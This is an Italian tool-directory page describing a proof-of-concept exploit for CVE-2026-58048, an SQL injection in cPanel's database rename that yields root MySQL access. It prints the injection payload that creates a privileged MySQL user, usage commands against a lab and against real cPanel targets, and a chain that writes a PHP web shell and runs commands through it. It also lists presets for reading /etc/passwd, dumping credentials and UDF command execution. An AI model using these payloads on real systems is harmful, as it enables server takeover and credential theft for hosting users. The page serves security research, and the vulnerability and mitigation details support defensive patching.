Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
POC-CVE-2026-58048 — Security research project | Kitploit
Strumenti/GitHubGitHub/imbas007/poc-cve-2026-58048
Privilege EscalationExploitationWeb Application ExploitationWeb SecurityPenetration TestingDatabase SecurityLabs & Practice
GitHubimbas007/poc-cve-2026-58048

POC-CVE-2026-58048

Security research project

Vedi Repository
116 giorni faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2026-58048

CVSS 4.0: 9.4 (Critico) | CWE-89: SQL Injection | NVD

Utente cPanel autenticato → SQL arbitrario come root MySQL tramite rinomina del database. cPanel preserva impropriamente il sql_mode della sessione dell'utente (ANSI_QUOTES) quando esegue operazioni di rinomina come root — un backtick nel nome del database fuoriesce dall'identificatore e inietta SQL.

root@kitploit:~
name: db`; GRANT ALL ON *.* TO 'rce'@'%' IDENTIFIED BY 'pwned!'; -- 

Avvio rapido (Laboratorio Docker)

root@kitploit:~
pip install -r requirements.txt

python3 simulate.py start   # start lab (MariaDB:13306, cPanel API:18080, Apache:18081)
python3 poc.py -t http://localhost:18080 --mysql-port 13306 --payload admin-user --verify
python3 simulate.py stop

La modalità laboratorio è rilevata automaticamente — non serve il flag --lab.

Target cPanel Reale

root@kitploit:~
python3 poc.py -t https://cpanel.example.com:2083 -u user -p 'pass' \
    --payload admin-user --verify

Preset dei Payload

SQL personalizzato: --inject "GRANT ALL ON *.* TO 'x'@'%' IDENTIFIED BY 'y'"

Catena RCE Completa (Laboratorio)

root@kitploit:~
# 1. Write shell to web root
python3 poc.py -t http://localhost:18080 --mysql-port 13306 \
    --payload webshell --shell /var/www/html/shell.php

# 2. Execute commands via HTTP!
curl "http://localhost:18081/shell.php?0=id"

Versioni Affette

cPanel < 11.110.0.137, 11.118.0.71, 11.126.0.78, 11.134.0.48, 11.136.0.32; WP Squared < 11.138.1.6

Mitigazione: aggiornare, oppure revocare la funzionalità MySQL agli utenti cPanel.

Riferimenti

  • cPanel Advisory
  • SecurityOnline

Solo per test di sicurezza autorizzati e formazione.

Scarica lo strumento
PresetEffetto
admin-user (default)Crea utente amministratore MySQL rce
compact-adminPayload admin breve (<64 caratteri — rientra nel limite di nome del cPanel reale; verifica: r/p)
webshellScrive shell PHP tramite INTO OUTFILE (--shell /var/www/html/shell.php)
read-fileLegge file del server tramite LOAD_FILE (--file /etc/passwd)
dump-usersEsporta tutte le credenziali MySQL in pwn.users
udf-rceEsecuzione di comandi OS tramite UDF